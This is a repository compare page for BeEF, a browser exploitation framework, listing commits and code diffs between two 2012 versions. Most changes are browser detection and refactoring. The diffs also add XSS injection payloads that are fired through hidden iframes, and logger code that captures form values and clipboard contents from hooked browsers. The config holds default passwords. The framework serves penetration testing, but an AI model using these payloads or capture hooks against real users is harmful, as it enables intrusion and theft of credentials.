Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.3.3
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
...
compare: Hiddenden:beef-0.4.3.4
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

55 Commits
beef-0.4.3 ... beef-0.4.3

Author SHA1 Message Date
bcoles
05deaaa8b5 Added Module: ActiveX Command Execution 2012-04-27 14:15:52 +09:30
bcoles
75cf67a6c4 Re-categorized some modules 
Fixed a couple of typos
 2012-04-27 10:35:17 +09:30
bcoles
d3005850d7 Updated supported browser list for several modules 
Added a few hostnames to the DNS Enumeration modules
 2012-04-26 20:07:45 +09:30
bcoles
a8e3d125d4 Added Module: Get Chrome Extensions 
Fixes issue #660
 2012-04-26 19:10:16 +09:30
Wade Alcorn
73bd6ab624 Added boilerplate to files with missing boilerplate 2012-04-24 18:00:15 +10:00
bcoles
923921b92b Added skeleton for custom hooks 
Part of issue #101
 2012-04-23 19:33:19 +09:30
bcoles
fa59e633b0 Popunder window now loads a plain page 2012-04-23 17:36:25 +09:30
bcoles
b5b5f0cd1a Fixed bug in IE version detection 2012-04-23 14:44:03 +09:30
antisnatchor
37c5edf2c2 Added strict doctype for /demos/basic.html page 2012-04-22 13:23:48 +01:00
antisnatchor
6cb8eb68fe Fixed bug on IE9 detection 2012-04-22 13:17:55 +01:00
antisnatchor
9835b0907d Merge branch 'master' of https://github.com/beefproject/beef 2012-04-20 14:47:45 +01:00
antisnatchor
f63240d3cb Added /api/hooks/:session RESTful api call in order to retrieve the full BrowserDetails for the hooked browser. 2012-04-20 14:46:46 +01:00
antisnatchor
5a345abfab Added print_info when unmounting a url (assethandler) 2012-04-20 14:08:08 +01:00
bcoles
a6b338e6c4 Added timeout variable decleration to get_internal_ip module 2012-04-20 22:34:34 +09:30
antisnatchor
217edee831 Added get_internal_ip module (uses an unsigned applet). Fix issue 576 2012-04-20 13:59:58 +01:00
antisnatchor
f8cd395e21 Added additional check on pathname for XssRays Issue 657 2012-04-20 11:40:28 +01:00
antisnatchor
f697e92c95 Decresed default XssRays iframe removal timeout, enhanced comments 2012-04-19 18:10:17 +01:00
antisnatchor
de68a00c75 Fix issue 658: removed content-type response header when replying to a successful founded Ray vector 2012-04-19 18:09:17 +01:00
antisnatchor
cf3587e2b1 Fix issue 657: the damn IE doesn't contain a forward slash on pathname 2012-04-19 18:08:16 +01:00
antisnatchor
d1e23c2084 Updated admin_ui and console extensions code to reflect the move of initialization extension into the core. 2012-04-18 14:37:44 +01:00
antisnatchor
cd4fce7887 Moved initialization extension into the core. BrowserDetails are a vital component of BeEF. There is no reason to don't have it in the core. 2012-04-18 12:54:48 +01:00
antisnatchor
8a3fadb5f8 removed test jenkind line 2012-04-18 12:04:37 +01:00
antisnatchor
6f57d563ea Jenkins test 2012-04-16 18:02:42 +01:00
antisnatchor
66dbf871f1 Added test for test_network_request using the API. 2012-04-15 15:09:26 +01:00
antisnatchor
54e244013b Removed response= variable from test_network_request module response. NOt needed. 2012-04-15 15:08:42 +01:00
antisnatchor
8f05a403ee Added Test_return_ascii_chars Debug module test using the API. 2012-04-15 13:45:24 +01:00
antisnatchor
98807ae9a3 Added RESTful API tests for /api/auth, /api/hooks, /api/modules. Added Test_return_long_string Debug module test using the API :D 2012-04-15 13:22:35 +01:00
antisnatchor
3ebe44732b Added beef.module.key.class to /api/module JSON response. 2012-04-15 12:54:04 +01:00
antisnatchor
8feef887b9 Fixed issue with malformed JSON response (missing }). No using hash.to_json to send response. 2012-04-15 11:56:00 +01:00
antisnatchor
364575592a Moved BeEF credentials from admin_ui extension to the main config.yaml. Updated both admin_ui and RESTful API to reflect the changes. 2012-04-15 10:53:08 +01:00
Christian Frichot
49af6ad443 Merge branch 'RESTenhance' 2012-04-15 16:44:05 +08:00
Christian Frichot
79a7dd3e88 RESTful Admin API Class now includes a LOGIN method 2012-04-15 16:38:38 +08:00
Christian Frichot
321a63b148 Placeholder admin RESTful API class 2012-04-15 07:24:56 +08:00
Christian Frichot
44e9871503 RESTful API now obeys permitted_ui_subnet 2012-04-15 07:24:17 +08:00
bcoles
e52b5101ee Updated logo location 
The favicon is not located at /favicon.ico if web server immitation is enabled
 2012-04-12 17:20:20 +09:30
bcoles
0c0027e06f Event Logger now logs form submissions 
Fixes issue #141
 2012-04-12 12:27:28 +09:30
bcoles
6af55c7e33 Event Logger now logs clipboard events (in IE6 only) 
Fixes issue# 653

Tidied up the 'submit' handler a bit. Part of issue #141
 2012-04-11 14:06:56 +09:30
antisnatchor
2b77416226 Issue 654: the main hook handler now extends the Router class 2012-04-09 12:26:57 +01:00
antisnatchor
dd2e522ce4 Issue 654: the XssRays handler is now extending the Router class 2012-04-09 11:36:35 +01:00
antisnatchor
22772c7822 Issue 654: the RESTful api classes are now extending the Router class 2012-04-09 11:16:21 +01:00
antisnatchor
8cac63a2f0 Issue 654: if /dh handler is called without params, return 404 2012-04-09 11:03:02 +01:00
antisnatchor
c60825faae Issue 654: adjusted DynamicReconstruction handler to extend the Router class 2012-04-09 10:33:23 +01:00
Wade Alcorn
3d80a952ae Version number updated 2012-04-08 16:07:22 +10:00
bcoles
cce8cf451c Added XssRays vectors: 
o URL encoded
	o Double URL encoded
	o Double nibble URL encoded

Fixes issue #65

Part of issue #47
 2012-04-05 14:26:30 +09:30
bcoles
f852b87b2b Added detection for Chrome 18 and 19 2012-04-05 12:45:10 +09:30
Michele Orru
4e1a283736 Merge pull request #656 from tmacuk/master 
Added IIS imitation default root page, thanks to @tmacuk
 2012-04-04 13:33:23 -07:00
Thomas Mackenzie
e168a05936 added pageerror logo for iis imitation 2012-04-04 20:04:31 +01:00
Thomas Mackenzie
e76f301593 added iis imitation construction page 2012-04-04 18:39:56 +01:00
antisnatchor
67d024441d Added Apache/Centos images for the default root page (web server imitation) 2012-04-04 16:45:39 +01:00
antisnatchor
616b969f96 added todo for IIS 6 default root page (web server imitation) 2012-04-04 16:42:42 +01:00
antisnatchor
0067e20702 Changed HTTP response 'server' header to IIS/6 when iis is specified. 2012-04-04 16:41:15 +01:00
antisnatchor
870a182411 Added HTTP response with default Apache centos root page (web server imitation). 2012-04-04 16:33:32 +01:00
antisnatchor
f5a77a63eb Prevent to mount the favicon.ico if we're imitating a web server. 2012-04-04 16:06:19 +01:00
antisnatchor
454280f7de Adjusted errors and default returns for the web server imitation. 2012-04-04 16:05:52 +01:00
antisnatchor
6bebb80f61 Added default 404 HTTP response bodies for Apache 2.2.3 and IIS 6 2012-04-04 15:47:21 +01:00
144 changed files with 2713 additions and 309 deletions
Expand all files Collapse all files

2
VERSION
View File

@@ -14,4 +14,4 @@
# limitations under the License.
#
0.4.3.3-alpha
0.4.3.4-alpha

12
config.yaml
View File

@@ -16,7 +16,7 @@
# BeEF Configuration file
beef:
version: '0.4.3.3-alpha'
version: '0.4.3.4-alpha'
debug: false
restrictions:
@@ -39,9 +39,8 @@ beef:
session_cookie_name: "BEEFSESSION"
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: false
#supported: apache, iis
type: "apache"
enable: false
type: "apache" #supported: apache, iis
database:
# For information on using other databases please read the
@@ -60,6 +59,11 @@ beef:
db_passwd: "beef123"
db_encoding: "UTF-8"
# Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
credentials:
user: "beef"
passwd: "beef"
crypto_default_value_length: 80
# You may override default extension configuration parameters here

2
core/bootstrap.rb
View File

@@ -30,6 +30,7 @@ require 'core/main/handlers/modules/beefjs'
require 'core/main/handlers/modules/command'
require 'core/main/handlers/commands'
require 'core/main/handlers/hookedbrowsers'
require 'core/main/handlers/browserdetails'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
@@ -50,4 +51,5 @@ require 'core/hbmanager'
require 'core/main/rest/handlers/hookedbrowsers'
require 'core/main/rest/handlers/modules'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/handlers/admin'
require 'core/main/rest/api'

1
core/core.rb
View File

@@ -27,6 +27,7 @@ require 'core/main/models/log'
require 'core/main/models/command'
require 'core/main/models/result'
require 'core/main/models/optioncache'
require 'core/main/models/browserdetails'
# @note Include the constants
require 'core/main/constants/browsers'

29
core/main/client/browser.js
View File

@@ -49,7 +49,7 @@ beef.browser = {
* @example: beef.browser.isIE8()
*/
isIE8: function() {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !!document.documentMode && !!window.XDomainRequest && !window.performance;
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
},
/**
@@ -57,7 +57,7 @@ beef.browser = {
* @example: beef.browser.isIE9()
*/
isIE9: function() {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
},
/**
@@ -308,12 +308,28 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false);
},
/**
* Returns true if Chrome 18.
* @example: beef.browser.isC18()
*/
isC18: function() {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==18)?true:false);
},
/**
* Returns true if Chrome 19.
* @example: beef.browser.isC19()
*/
isC19: function() {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function() {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19();
},
/**
@@ -377,7 +393,9 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
C14: this.isC14(), // Chrome 14
C15: this.isC15(), // Chrome 15
C16: this.isC16(), // Chrome 16
C17: this.isC17(), // Chrome 16
C17: this.isC17(), // Chrome 17
C18: this.isC18(), // Chrome 18
C19: this.isC19(), // Chrome 19
C: this.isC(), // Chrome any version
FF2: this.isFF2(), // Firefox 2
@@ -434,7 +452,8 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo
if (this.isC15()) { return '15' }; // Chrome 15
if (this.isC16()) { return '16' }; // Chrome 16
if (this.isC17()) { return '17' }; // Chrome 17
if (this.isC18()) { return '18' }; // Chrome 18
if (this.isC19()) { return '19' }; // Chrome 19
if (this.isFF2()) { return '2' }; // Firefox 2
if (this.isFF3()) { return '3' }; // Firefox 3

65
core/main/client/logger.js
View File

@@ -58,9 +58,11 @@ beef.logger = {
* Starts the logger
*/
start: function() {
this.running = true;
var d = new Date();
this.time = d.getTime();
$j(document).keypress(
function(e) { beef.logger.keypress(e); }
).click(
@@ -71,9 +73,18 @@ beef.logger = {
).blur(
function(e) { beef.logger.win_blur(e); }
);
/*$j('form').submit(
$j('form').submit(
function(e) { beef.logger.submit(e); }
);*/
);
document.body.oncopy = function() {
setTimeout("beef.logger.copy();", 10);
}
document.body.oncut = function() {
setTimeout("beef.logger.cut();", 10);
}
document.body.onpaste = function() {
beef.logger.paste();
}
},
/**
@@ -137,11 +148,57 @@ beef.logger = {
},
/**
* Is called whenever a form is submitted
* Copy function fires when the user copies data to the clipboard.
*/
copy: function(x) {
try {
var c = new beef.logger.e();
c.type = 'copy';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Cut function fires when the user cuts data to the clipboard.
*/
cut: function() {
try {
var c = new beef.logger.e();
c.type = 'cut';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Paste function fires when the user pastes data from the clipboard.
*/
paste: function() {
try {
var c = new beef.logger.e();
c.type = 'paste';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Submit function fires whenever a form is submitted
* TODO: Cleanup this function
*/
submit: function(e) {
/*this.events.push('Form submission: Action: '+$j(e.target).attr('action')+' Method: '+$j(e.target).attr('method')+' @ '+beef.logger.get_timestamp()+'s > '+beef.logger.get_dom_identifier(e.target));*/
try {
var f = new beef.logger.e();
var values = "";
f.type = 'submit';
f.target = beef.logger.get_dom_identifier(e.target);
for (var i = 0; i < e.target.elements.length; i++) {
values += "["+i+"] "+e.target.elements[i].name+"="+e.target.elements[i].value+"\n";
}
f.data = 'Action: '+$j(e.target).attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
this.events.push(f);
} catch(e) {}
},
/**

67
core/main/client/net/xssrays.js
View File

@@ -49,17 +49,24 @@ beef.net.xssrays = {
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
vectors: [
// {input:"',XSS,'", name: 'Standard DOM based injection single', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
// {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
// {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
{input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
@@ -99,7 +106,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) {
if (this.debug && !beef.browser.isIE()) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log);
}
},
@@ -181,6 +188,13 @@ beef.net.xssrays = {
if (target.search.length > 0) {
target.search = target.search.slice(1);
target.search = target.search.split(/&|&amp;/);
if(beef.browser.isIE() && target.pathname.charAt(0) != "/"){ //the damn IE doesn't contain the forward slash in pathname
var pathname = "/" + target.pathname;
}else{
var pathname = target.pathname;
}
var params = {};
for (var i = 0; i < target.search.length; i++) {
target.search[i] = target.search[i].split('=');
@@ -197,20 +211,20 @@ beef.net.xssrays = {
}
if (this.vectors[i].url) {
if (target.port == null || target.port == "") {
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + target.pathname, 'GET', this.vectors[i], params, true);//params
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], params, true);//params
} else {
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + target.pathname, 'GET', this.vectors[i], params, true);//params
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], params, true);//params
}
}
if (this.vectors[i].path) {
if (target.port == null || target.port == "") {
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + target.pathname, 'GET', this.vectors[i], null, true);//paths
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], null, true);//paths
} else {
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + target.pathname, 'GET', this.vectors[i], null, true);//paths
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], null, true);//paths
}
}
}
@@ -365,11 +379,20 @@ beef.net.xssrays = {
/*
* ++++++++++ create the iFrame that will contain the attack vector ++++++++++
*/
var iframe = document.createElement('iframe');
if(beef.browser.isIE()){
try {
var iframe = document.createElement('<iframe name="ray'+Math.random().toString() +'">');
} catch (e) {
var iframe = document.createElement('iframe');
iframe.name = 'ray' + Math.random().toString();
}
}else{
var iframe = document.createElement('iframe');
iframe.name = 'ray' + Math.random().toString();
}
iframe.style.display = 'none';
iframe.id = 'ray' + beef.net.xssrays.uniqueID;
iframe.time = beef.net.xssrays.timestamp();
iframe.name = 'ray' + Math.random().toString();
if (method === 'GET') {
if(beef.browser.isC() || beef.browser.isS()){
@@ -433,11 +456,13 @@ beef.net.xssrays = {
numOfConnections++;
//beef.net.xssrays.printDebug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
if (parseInt(beef.net.xssrays.timestamp()) - parseInt(iframe.time) > 5) {
if (iframe) {
beef.net.xssrays.complete();
beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
document.body.removeChild(iframe);
}
try{
if (iframe) {
beef.net.xssrays.complete();
beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
document.body.removeChild(iframe);
}
}catch(e){beef.net.xssrays.printDebug("Exception [" + e.toString() + "] when cleaning iframes.")}
}
}

2
core/main/client/session.js
View File

@@ -82,7 +82,7 @@ beef.session = {
/**
* Overrides each link, and creates an iframe (loading the href) instead of following the link
*/
persistant: function() {
persistent: function() {
$j('a').click(function(e) {
if ($j(this).attr('href') != '')
{

15
extensions/initialization/handler.rb → core/main/handlers/browserdetails.rb
View File

@@ -14,18 +14,15 @@
# limitations under the License.
#
module BeEF
module Extension
module Initialization
#
# The http handler that manages the return of the initial browser details.
#
class Handler
module Core
module Handlers
# @note Retrieves information about the browser (type, version, plugins etc.)
class BrowserDetails
@data = {}
HB = BeEF::Core::Models::HookedBrowser
BD = BeEF::Extension::Initialization::Models::BrowserDetails
BD = BeEF::Core::Models::BrowserDetails
def initialize(data)
@data = data
@@ -33,7 +30,7 @@ module BeEF
end
def err_msg(error)
print_error "[INITIALIZATION] #{error}"
print_error "[Browser Details] #{error}"
end
def setup()

55
core/main/handlers/hookedbrowsers.rb
View File

@@ -18,42 +18,44 @@ module Core
module Handlers
# @note This class handles connections from hooked browsers to the framework.
class HookedBrowsers
class HookedBrowsers < BeEF::Core::Router::Router
include BeEF::Core::Handlers::Modules::BeEFJS
include BeEF::Core::Handlers::Modules::Command
#antisnatchor: we don't want to have anti-xss/anti-framing headers in the HTTP response for the hook file.
configure do
disable :protection
end
# Process HTTP requests sent by a hooked browser to the framework.
# It will update the database to add or update the current hooked browser
# and deploy some command modules or extensions to the hooked browser.
def call(env)
get '/' do
@body = ''
@request = Rack::Request.new(env)
@params = @request.query_string
@response = Rack::Response.new(body=[], 200, header={})
@params = request.query_string
#@response = Rack::Response.new(body=[], 200, header={})
config = BeEF::Core::Configuration.instance
# @note check source ip address of browser
permitted_hooking_subnet = config.get('beef.restrictions.permitted_hooking_subnet')
target_network = IPAddr.new(permitted_hooking_subnet)
if not target_network.include?(@request.ip)
BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{@request.ip}) rejected.")
@response = Rack::Response.new(body=[], 500, header={})
return
if not target_network.include?(request.ip)
BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{request.ip}) rejected.")
error 500
end
# @note get zombie if already hooked the framework
hook_session_name = config.get('beef.http.hook_session_name')
hook_session_id = @request[hook_session_name]
hook_session_id = request[hook_session_name]
hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => hook_session_id) if not hook_session_id.nil?
# @note is a new browser so return instructions to set up the hook
if not hooked_browser
# @note generate the instructions to hook the browser
host_name = @request.host
host_name = request.host
(print_error "Invalid host name";return) if not BeEF::Filters.is_valid_hostname?(host_name)
build_beefjs!(host_name)
@@ -63,9 +65,9 @@ module Handlers
hooked_browser.lastseen = Time.new.to_i
# @note Check for a change in zombie IP and log an event
if hooked_browser.ip != @request.ip
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{@request.ip}","#{hooked_browser.id}")
hooked_browser.ip = @request.ip
if hooked_browser.ip != request.ip
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
hooked_browser.ip = request.ip
end
hooked_browser.count!
@@ -76,37 +78,18 @@ module Handlers
zombie_commands.each{|command| add_command_instructions(command, hooked_browser)}
# @note We dynamically get the list of all browser hook handler using the API and register them
BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, @request, @response)
BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, request, response)
end
# @note set response headers and body
@response = Rack::Response.new(
body = [@body],
status = 200,
header = {
'Pragma' => 'no-cache',
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0',
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST, GET'
}
)
@body
end
private
# @note Object representing the HTTP request
@request
# @note Object representing the HTTP response
@response
# @note A string containing the list of BeEF components active in the hooked browser
# @todo Confirm this variable is still used
@beef_js_cmps
end
end

17
extensions/initialization/models/browserdetails.rb → core/main/models/browserdetails.rb
View File

@@ -14,8 +14,7 @@
# limitations under the License.
#
module BeEF
module Extension
module Initialization
module Core
module Models
#
# Table stores the details of browsers.
@@ -26,16 +25,7 @@ module Models
include DataMapper::Resource
storage_names[:default] = 'extension_initialization_browserdetails'
#
# Class constructor
#
def initialize(config)
super(config)
end
storage_names[:default] = 'core_browserdetails'
property :session_id, String, :length => 255, :key => true
property :detail_key, String, :length => 255, :lazy => false, :key => true
property :detail_value, Text, :lazy => false
@@ -59,7 +49,7 @@ module Models
return nil if not get(session_id, detail_key).nil?
